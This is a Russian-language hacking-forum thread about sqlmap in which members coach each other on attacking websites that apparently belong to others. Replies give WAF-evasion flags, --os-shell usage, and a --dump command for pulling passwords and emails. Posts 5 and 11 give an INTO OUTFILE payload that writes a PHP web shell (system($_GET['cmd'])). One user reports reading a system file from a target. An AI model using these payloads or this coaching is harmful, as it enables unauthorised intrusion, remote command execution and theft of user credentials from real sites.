Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    --start=n
    где n - номер записи с которой начинать дамп
     
    Xsite and BabaDook like this.
  2. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    57
    Likes Received:
    12
    Reputations:
    5
    Там WAF не самый тоскливый стоит - реагирует практически на все. Не факт что sqlmap так просто с ним справится. Попробуй конечно тамперами пройтись, но меня терзают смутные сомнения...
    И да - задержку еще попробуй секунд до 5 увеличить - WAF блокирует ип при ошибках примерно на 3-5 сек.
    Подумал и решил дописать - в данном случае эффективнее будет руками работать. Я так думаю.
     
    #62 AlexG, 21 Dec 2015
    Last edited: 21 Dec 2015
  3. ktulhu777

    ktulhu777 New Member

    Joined:
    22 Sep 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребята кто подскжет функции для обхода WAf ??? Когда пытаюсь рутить скулю руками блочит ип http://prntscr.com/9gqj9m я так понимаю это реагирует этот чертов WAF... Был бы очень признателен за любу помощь в идеале по джпберу или скупу
     
  4. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Помогите застрял на этом: http://rghost.ru/6mLmfsYLb.view

    Как мне залить shell поподробнее пожалуйста обьясните!!!
     
  5. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    1)Надо узнать полный путь /home/www/ .... /'
    2)запрос --is-dba то есть права админа на запись ,если False ,то облом
    3)Можешь средставми SQLMAP --os-shell и указываешь полный путь home/www/serv1/
    ИЛИ как на твоем скрине
    Code:
    select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php'
    Дальше путь до шелла shell.php?cmd=команда;
     
    _________________________
  6. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    по средства --is-dba --random-agent я узнал что права TRUE.
    Далее делаю как Вы и сказали т.е index.php?id=1 --os-shell --random-agent
    И у меня показывает вот такую ошибку постоянно, и без --random-agent тоже.

    http://rghost.ru/7y2N7VBtJ.view

    Как быть?
     
  7. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Блокирует запросы, там или WAF стоит , пробуйте так -o --delay=1 --retries=15
     
    _________________________
  8. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Подскажи плиз ещё кое что, тут как быть это уже другой сайт, права здесь тоже TRUE, что тут указывать!???

    http://rghost.ru/7zjZgGh7x.view
     
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    тут нужно укзаывать полный путь, который обычно можно получить при раскрытии путей (https://www.owasp.org/index.php/Full_Path_Disclosure)
    Нужно указать путь так ,чтобы туда были права на запись (директория tmp,изображений и т.д)
    как вариант можно попробовать пункт 4 и сбрутить, но шанс небольшой
     
    _________________________
    #69 grimnir, 30 Dec 2015
    Last edited: 30 Dec 2015
  10. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Файл /etc/password получилось скачать и просмотреть там логи какие то. Но вот как именно узнать есть или нету права на запись в какой нибудь папке не могу вкурить, и пример команды для залития шелла можно пожалуйста.
     
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    а полный путь у вас уже есть? вида /home/www/ ??
    Если говорите /etc/password получилось именно скачать,то можно конфиги так же считать,но опять же говорю нужен полный путь
    "пример команды для залития шелла можно пожалуйста."
    Code:
    select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ тут каталог с правами на запись /shell.php'
     
    _________________________
  12. Legionanonymous

    Legionanonymous New Member

    Joined:
    30 Dec 2015
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Полного пути нету, я хз как его найти, пожалуйста братюнь обьясни чё по чём, или напиши в лс я тебе дам ссылку сайта может подскажешь, очень нужен сайт этот
     
  13. LeninDie

    LeninDie Member

    Joined:
    26 Dec 2015
    Messages:
    72
    Likes Received:
    8
    Reputations:
    2
    раньше выводились все данные нормально, сегодня пробую и вот такое:
    [​IMG]
    среди доступных бд было 4, теперь одна и невозможно ничего вывести. перепроверил - уязвимость осталась. как я понимаю доступа к бд больше нет? не могу даже через --sql-shell select version() вывести.
    --tamper="between,randomcase,space2comment" -v 3 и -D db_site --tables --technique=B --no-cast -v3 пробовал - не помогло
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Всем привет.
    Подскажите пожалуйста люди умные, люди смелые для чего нужны функции
    --alert
    --eval
     
  15. ph03nix

    ph03nix New Member

    Joined:
    7 Jan 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребята, всем привет, я новенький и сразу с вопросом))
    Вот прогнал ZAP'ом нужный мне сайт, нашел уязвимость "0 AND 1=1 -- " Как ей воспользоваться??
     
  16. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    sqlmap.py -u "http://www.site.com/ уязвимый параметр" --technique=B
     
    #76 Shubka75, 7 Jan 2016
    Last edited: 7 Jan 2016
  17. ph03nix

    ph03nix New Member

    Joined:
    7 Jan 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Так, спасибо, но не понял, уязвимый параметр это что то типа "index.php?id=", дело в том что ZAP выдал уязвимость на странице "http://site.ru/"
     
  18. 0x1d

    0x1d New Member

    Joined:
    4 Oct 2011
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    Всем привет! Подскажите, как сделать дамп значений всех колонок по условию его соответствия одной колонки из всех. Например: Вывести password и email если userID=1? Спасибо.
     
  19. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    -C email,password --where="userID=1" --dump
     
  20. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    есть мскл версия 3, а вот инфо схемы увы нет